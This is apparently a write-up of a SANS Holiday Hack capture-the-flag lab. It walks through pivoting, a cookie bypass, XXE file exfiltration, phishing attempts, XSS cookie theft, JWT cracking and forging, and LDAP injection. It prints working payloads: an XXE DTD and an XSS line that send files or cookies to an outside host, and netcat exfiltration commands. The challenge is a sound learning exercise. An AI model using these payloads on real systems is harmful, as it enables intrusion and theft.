If you've ever dealt with ncat, sometimes it is hard to tell that there is a prompt there.  It looks like a blank space, but if you type a commands, like cd .. and ls, it will show the output.  I know I escaped because in rbash, you can't change directories.

From the escaped shell, I could observe what other users were doing by typing “/bin/ps aux”. Someone locked down the $PATH, so I had to resort to full path naming to run programs - also called absolute paths. I learned quite a bit by watching the other players and downloading some of their exploit attempts. I carefully examined the exploits.  Out of the restricted shell, I could type /bin/cat /etc/hosts to find some machines around me. I also used nmap to scan the machines around the l2s server.
I found Alabaster Snowball’s password in the tomcat dev files.
From the hints, I realized that I didn’t actually have to do much on this box other than to use it as a pivot into the internal network.
ssh -L 9000:10.142.0.x:<port number I’m interested in here> alabaster.snowball@l2s.northpolechristmastown.com

SMB Server
After scanning the systems using the hint provided by Holly Evergreen, I found an SMB Server. smbclient, for whatever reason wouldn’t work for me. So, I instead used ssh forwarding to forward the ip of the smb server to my machine.  I have the pics posted earlier - in the "Holiday Hack Questions" Section.

ssh -L 9000:10.142.0.7:445 alabaster.snowball@l2s.northpolechristmastown.com
I didn’t want to use port 445 because I would have to sudo.

My machine is a Mac, so I opened up a browser and typed smb://127.0.0.1:9000. Finder picked up that I wanted to open a share and prompted me to open it with Finder, so I clicked OK. Then a login prompt popped up, and I put in Alabaster Snowball's credentials. They were username: alabaster_snowball; password: stream_unhappy_buy_loss.
I obtained the BOLO - Munchkin Mole Report.docx, GreatBookPage3.pdf, MEMO - Password Policy Reminder.docx, Naughty and Nice List.csv, Naughty and Nice list.docx.

Mail Server
The nmap scan also revealed a mail server at 10.142.0.5. I tried reading e-mails and sending phishing e-mails by logging in via telnet. Then I read the hints and found out that there might be an easier way in. So, I set up ssh forwarding, set my browser to use a proxy, and typed "10.142.0.5/robots.txt" into my browser. I looked at robots.txt and found a file that was disallowed. It was the source code for the cookie handling: cookie.txt. 


Cookie.txt

The hints for this one were given by: Pepper Minstix. I found a useful resource that lets people test node.js modules in their browser called runkit + npm. I found the aes256 module and played around with it.

var aes256 = require("aes256");            // version 1.0.2, as selected on RunKit
var key = 'santaisonabender';
var encrypted = 'AAAAAAAAAAAAAAAAAAAAAA';   // 22 base64 characters = 16 bytes = just an IV, no ciphertext
var plaintext = '';
console.log(encrypted);
var decrypted = aes256.decrypt(key, encrypted);
console.log(decrypted);
if (decrypted === plaintext) {
    console.log('equal');
}

I found out that the IV is completely dropped by this module: it treats the first 16 bytes of the decoded value as the IV and decrypts only what comes after them. In the program, the value is AES-256 encrypted and then base64 encoded, so to decrypt it is base64 decoded and then AES-256 decrypted.  22 A's are required because 16 bytes (the length of the IV) base64-encode to 22 characters (plus two = padding characters): a 22-character value decodes to nothing but an IV, leaving no ciphertext at all, and in the CTR mode this module uses, decrypting zero bytes yields an empty string whatever the key is.  I played with base64 encoding to see what happens, and that is how I came by the fact that 16 bytes are drawn out to 22 characters.

The hints provided by Pepper Minstix hinted at changing the cookie. The code appeared as though it compared the plaintext variable in the decryption function to the plaintext value in the cookie. The plaintext variable in the decryption function’s value is gotten by passing the key and the ciphertext from the cookie to the decryption algorithm. If the ciphertext is 22 characters, those characters are dropped, leaving it blank. I’m not sure why it’s blank given that the key should still passed to the algorithm, but it worked, so I didn’t really question it. I would guess it’s the way that node.js handles undefined objects, but I’m not sure.
I changed the cookie in my browser, using Developer Tools in Firefox. I left the plaintext blank and put 22 A’s in the cipher text. 


Changing the cookie.
Then I looked at the response and saw /account.html. Typed in 10.142.0.5/account.html and I was logged into alabaster.snowball's account. I found that I could log into other accounts using the same method as well, by changing the user account to whatever user I wanted to be. In alabaster.snowball's account, I found hints to get access to the EMI server. Namely, Alabaster saying that he would click on any link in any e-mail containing the words gingerbread, cookie, recipe. Minty Candycane sent Alabaster Snowball an e-mail asking about DDE Injection, as well as sending a proof of concept found here: http://mail.northpolechristmastown.com/attachments/dde_exmaple_minty_candycane.png.


Minty Candycane DDE Example

I posted those pics earlier, in the section about the Holiday Hack Challenge Questions.
EAAS Server
The nmap scan found this server at 10.142.0.13. The hints for this challenge were provided by Sugar Plum Mary. Again, used ssh port forwarding to pivot to this machine, and changed the proxy in my browser to allow me to see this web page.

Logging onto the eaas server, there is an area to submit requests to build elves using xml. 


EAAS Web Site

Click on the Elf Checking Service to Exploit this web site.


Not always Upload Capability that is vulnerable, but when it is....

This particular site is vulnerable to an XML External Entity (XXE) attack. The attack detailed here works: https://pen-testing.sans.org/blog/2017/12/08/entity-inception-exploiting-iis-net-with-xxe-vulnerabilities. Below is the XML that I submitted to the eaas server; its DOCTYPE pulls a second DTD from my server (x.x.x.x stands for my own host throughout):

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE demo [
<!ELEMENT demo ANY >
<!ENTITY % extentity SYSTEM "http://x.x.x.x:6666/sweets.dtd">
%extentity;
%inception;
%sendit;
]>

Below is the dtd file that I put on my server that I use to test vulnerabilities with.


<?xml version="1.0" encoding="UTF-8"?>
<!-- dataismine reads the target file on the server -->
<!ENTITY % dataismine SYSTEM "file:///c:/greatbook.txt">
<!-- &#x25; is a percent sign: a parameter entity cannot be declared literally inside
     another entity's value, so sendit only comes into being when %inception; is expanded.
     Expanding %sendit; then fetches my URL with the file's contents in the query string. -->
<!ENTITY % inception "<!ENTITY &#x25; sendit SYSTEM 'http://x.x.x.x:6667/?%dataismine;'>">

Upload DTD XXE Exploit that borrows a file...

I used the python module SimpleHTTPServer to serve sweets.dtd so I
didn’t have to serve a full website.  I made sure I was in a directory
I wasn’t afraid for people to see the files in considering that
SimpleHTTPServer serves the current directory by default.

python -m SimpleHTTPServer 6666

Then I had a netcat listener running to catch greatbook.txt:

nc -nvlp 6667 > greatbook.txt

(What lands in greatbook.txt is the parser's whole HTTP request, with the file's contents in the query string after the ?, so the page text has to be read out of that.)



Serving Sweets on my borrowing Server

Great Book Page!

EMI Server
I wasn’t successful obtaining this file. I tried phishing Alabaster Snowball using the hints detailed above in the Mail Server section. The hints for this one were given by Shinny Upatree. For whatever reason, I only got Alabaster Snowball to successfully connect to me once or twice, and the same payload would not work another time. I tried the proof of concept that Minty Candycane submitted. I tried turning it around and using (New-Object System.Net.WebClient).UploadFile(). I tried running ping and capturing the traffic on my server to test connectivity. I tried using nc to send the file to myself as nc x.x.x.x 6666 < C:\\GreatBookPage7.pdf. I tried nc x.x.x.x 6666 &lt; C:\\GreatBookPage7.pdf thinking I might need to escape the < sign. I tried to offload the file onto the SMB share owned by the elves or one of the other servers owned by the elves, since I have access to them. I tried to offload the file to the l2s server, since I could break out of rbash on it. I found out the IP of the l2s server by doing:
/bin/netstat -n. 
10.142.0.11 
I put the listener in a hidden folder on the l2s server. (That could make things a bit easier for other players, if they found the hidden folder, if I was actually successful. :))


EDB Server
This one was vulnerable to XSS. The hints for this one were given by: Wunorse Openslae. I was having trouble with syntax on this one. The IP for this one was 10.142.0.6. I used ssh forwarding and set up a proxy on my browser. Navigating to 10.142.0.6, you see a login page. If you click on the Support link, you’re presented with a form to help get your login credentials if you’ve forgotten them. The message area is vulnerable to XSS. If you view the source of the page, at the bottom there is javascript that shows how the credential is stored. The credential is stored in local storage as np-auth. If you view the robots.txt page, you will see that the dev page is disallowed. This gives the LDAP information that is needed later to exploit this server.
I used the XSS filter evasion techniques denoted here until I found one that popped an alert box, then changed the payload:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
Here is the XSS that I used:

<IMG SRC=# onerror=window.open("http://x.x.x.x/cookiecatcher.php?cookie="+document.cookie)>

It just plain looks weird, but I'm not awesome with JavaScript. I found it after playing around with the syntax a bit.
On my server, I had a PHP program that I found that logs the cookie, found here:
https://breakthesecurity.cysecurity.org/2011/09/how-to-create-cookie-stealer-coding-in- php-get-via-email.html
I served it using PHP's built-in development web server (the flag is an uppercase -S):

sudo php -S 0.0.0.0:80
Then I decoded the np-auth token using py-jwt. I didn't need a secret to decode it. I tried changing the expiration on that token, but I didn't have the secret to successfully forge a new token.


Alabaster Snowball's JWT Token
Blank Key
Alabaster's decoded JWT Token


I didn’t know that I had to crack the secret until a friend gave me a pointer.
I used jwtcrack to crack it and got the secret “3lv3s”.


Alabaster's Cracked JWT Secret.

I used the secret to forge a token with py-jwt.


Forged Alabaster's JWT Token.

I changed the local storage to hold a token named np-auth, with the value of the newly forged key.
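The three steps above (read the token without the secret, recover a weak HS256 secret from a wordlist, then verify with it) as an added standard-library example, not code from the write-up or from the challenge; the claims in the sample token and the wordlist are constructed, and only the secret "3lv3s" comes from the post.

```python
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(payload: dict, secret: str) -> str:
    """Build a compact HS256 JWT: base64url(header).base64url(payload).base64url(HMAC)."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


def decode_unverified(token: str) -> dict:
    """The payload is only base64url-encoded, which is why np-auth was readable with no secret."""
    return json.loads(_b64url_decode(token.split(".")[1]))


def verify_hs256(token: str, secret: str) -> bool:
    """Recompute the HMAC and compare in constant time; this is the check the server must do."""
    header, body, sig = token.split(".")
    expected = hmac.new(secret.encode(), f"{header}.{body}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, _b64url_decode(sig))


def find_weak_secret(token: str, candidates: Iterable[str]) -> Optional[str]:
    """Audit check: does any wordlist entry validate the signature? None means the secret held."""
    for candidate in candidates:
        if verify_hs256(token, candidate):
            return candidate
    return None


# Constructed sample token shaped like np-auth and signed with the secret the post cracked.
SAMPLE_TOKEN = sign_hs256({"uid": "alabaster.snowball", "ou": "elf"}, "3lv3s")
# Constructed wordlist standing in for what jwtcrack would try.
WORDLIST = ["password", "secret", "santa", "3lv3s", "northpole"]
STRONG_TOKEN = sign_hs256({"uid": "alabaster.snowball"}, "hypothetical-long-random-secret-0cd3")
```

A token signed with a long random secret (STRONG_TOKEN) survives the same wordlist, which is the fix the server needed.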


Changing Local Storage np-auth
EDB Server

I just got into the EDB/LDAP server the night that the challenge was due, so I didn't finish getting that flag.  The hints give away what it is vulnerable to.  Also, I knew what the other servers were vulnerable to, and nmap says this one is running LDAP, hence the reason I know it's the LDAP one.

If you look at robots.txt, you see that the /dev folder is supposed to be disallowed in the search results.  Looking at the dev folder, you see this:


Dev Listing
LDAP LDIF Template
Update:  Well, that didn't take long.  I'm holding off on reading write-ups until I solve these.  It paid off.  I returned all the records from reading this post on the SANS Pen Testing blog.

https://pen-testing.sans.org/blog/2017/11/27/understanding-and-exploiting-web-based-ldap

Getting past this was annoying until I figured out what to do.


EDB Find Elves Source Code
So basically what happens is the radio button on the web page has to be checked for the variable "isElf" to be true, else "isElf" is false.  If "isElf" from the request form is not equal to true, then isElf is reindeer.  If "isElf" from the request form is equal to true, then isElf is elf.  These represent the ou in LDAP.  So I did this query and it returned Rudolph.  I was wondering how it returned Rudolph.  Look about two sentences ago: if isElf is false then ou = reindeer.  That is how Rudolph was returned.  Duh to me.  Then I noticed the scrollbar at the bottom.


Returning Everyone's Records
So how did everyone else's records return?  I honestly have no idea how this worked.  I will have to study it more. But, I changed the attributes as described in the article like so:


Changing HTML to get Password Hashes
It returned everyone's password hashes as well. Nice!


Santa's Password Hash!
Either crack it or try Google, because it's an MD5 hash.


Santa's Cracked Password
Log out and attempt to log in as Santa Claus...


Entering Password for Santa Panel
Letter From The Wizard!

NPPD Server

We weren't allowed to attack this one, but we could use it to get more information than was intended.
The people on the naughty and nice list could be compared to the infractions in the database, which can then be used to determine how many infractions it takes to be placed on the naughty list. It could potentially be used to see who the moles are as well.
